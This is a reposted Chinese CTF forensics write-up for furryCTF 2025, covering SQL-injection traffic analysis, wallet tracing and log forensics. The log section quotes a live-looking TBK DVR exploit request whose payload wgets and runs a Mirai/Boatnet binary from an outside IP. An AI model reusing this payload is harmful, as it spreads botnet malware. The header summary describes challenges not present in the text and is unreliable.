文章总结: 本文详细记录了furryCTF2025比赛中的三个题目解题过程,包括利用脚本爬取并解码Base16数据、逆向分析基于Emoji的堆栈虚拟机指令集并模拟执行、以及通过GF(2)域高斯消元法求解线性方程组还原Flag。每个题目都提供了完整的Python脚本和运行结果,展示了从分析到实现的完整思路。 综合评分: 75 文章分类: CTF,逆向分析,实战经验
关键发现
在分析POST请求时,发现了一个包含base64编码的flag:
这个编码字符串出现在针对/loginok.html的POST请求中,是攻击者尝试的SQL注入payload的一部分。解码flag使用base64解码工具对编码字符串进行解码:
ZnVycnlDVEZ7RnIwbV9Bbm9uOW0wdXNfVG9fUm8wdH0=
攻击原理分析
- FTP服务漏洞 攻击者首先通过FTP服务的匿名登录功能(USER anonymous)成功登录到服务器。虽然FTP服务器上没有文件,但攻击者发现了服务器还运行着Web界面(Wing FTP Server的Web客户端)。
- SQL注入攻击 攻击者使用SQLMap工具对Web登录页面(/loginok.html)进行SQL注入攻击:
尝试了多种注入 payload,包括单引号和双引号注入
最终通过构造特殊的用户名参数,在请求中包含了base64编码的flag
- 权限提升 flag的内容Fr0m_Anon9m0us_To_Ro0t暗示了攻击者的目标:从匿名用户权限提升到root权限。这也是为什么FTP服务器会被攻击的原因 – 它只是攻击者获取服务器访问权限的入口点。
furryCTF{Fr0m_Anon9m0us_To_Ro0t}
谁动了我的钱包
很简单黑客要转钱肯定转最高的所以一直选择最高的就行追踪
POFP{0xFF7C350e70879D04A13bb2d8D77B60e603b7DB72}
溯源
经过再次深度分析,我发现之前提到的 CVE-2023-1389 (TP-Link) 和 CVE-2021-35395 (Realtek) 虽然在日志中出现了,但它们的响应状态码是 200 且响应大小与默认页面(如 501 或 782 字节)一致,这说明这些攻击大概率失败了(只是扫描到了默认页面)。 真正的攻击隐藏在 POST 请求中,且状态码是 201 (Created),这意味着服务器成功执行/接受了该请求。
1. 真正的攻击者与漏洞
攻击特征: 针对 TBK DVR (数字视频录像机) 设备的远程命令执行 (RCE) 漏洞。
关键日志:
Plaintext
144.172.98.50 - - [24/Sep/2025:23:24:12 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F103.77.241.165%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1"201166"-""Mozilla/5.0"
状态码: 201 (关键证据!表示请求成功,文件/资源被创建)。
CVE 编号: CVE-2024-3721 (或者关联的旧编号 CVE-2018-9995,但 opt=sys&cmd=... 的利用方式更符合 2024 年披露的特征)。
攻击者 IP: 144.172.98.50
攻击载荷 (Payload): cd /tmp;rm boatnet.arm7; wget http://103.77.241.165/hiddenbin/boatnet.arm7; chmod 777 *; ./boatnet.arm7 tbk 这是典型的 Mirai / Boatnet 僵尸网络植入行为。
furryCTF{CVE-2024-3721}
靶场推荐
好靶场
学安全,别只看书上手练,就来好靶场。
🔗入口:http://www.loveli.com.cn/
有宝子就问了,主播主播,这么好的靶场怎么用:首先关注好靶场 然后发送bug,可以点击链接直接登录
福利1
找到个人中心,邀请码输入3e5adb8a55db48b8,白嫖14天高级会员。
福利2
关注好靶场bilibili。拿着关注截图找到客服,领取5积分或者7天高级会员。
往期推荐
比赛篇:
【比赛篇】furryCTF 2025 高校联合新神赛(Web)
【比赛篇】furryCTF 2025 高校联合新神赛(Misc)
【比赛篇】破阵试炼(上)
【比赛篇】破阵试炼(下)
工具推荐:
告别手输验证码!这款Burp插件+OCR神技,轻松搞定登录框爆破
Burp Suite 插件实战:利用 JWT Editor 一站式通杀四种 JWT 认证缺陷
实战分享:手把手教你突破前端加密混淆限制
还是抓不到包?手把手教你解决安卓高版本 HTTPS 证书报错
安卓逆向第一课:如何用JADX挖出隐藏的Flag?
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:小叶Sec 小叶Sec 小叶Sec《【比赛篇】furryCTF 2025 高校联合新神赛(PPC+Pwn+Forensics))》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论